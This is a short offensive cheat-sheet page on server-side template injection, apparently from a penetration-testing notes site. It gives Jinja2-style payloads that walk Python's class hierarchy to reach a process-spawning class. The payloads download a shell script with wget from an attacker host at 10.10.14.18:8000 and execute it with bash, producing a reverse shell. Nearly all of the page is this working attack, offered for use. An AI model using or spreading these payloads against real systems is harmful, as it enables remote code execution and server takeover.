SSTI

reverse shell payload

first check which payload is working , after that insert this into that payload let say -> {{7*7}} works , then replace 7*7 with this =>

[].__class__.__base__.__subclasses__().pop(407)(['wget','10.10.14.18:8000/shell.sh'])
[].__class__.__base__.__subclasses__().pop(407)(['bash','shell.sh'])

lafter replacing payload =>

{{[].__class__.__base__.__subclasses__().pop(407)(['wget','10.10.14.18:8000/shell.sh'])}}
{{[].__class__.__base__.__subclasses__().pop(407)(['bash','shell.sh'])}}

Previouscommand injection Next403 Bypass

Last updated 1 year ago

hashtagreverse shell payload

reverse shell payload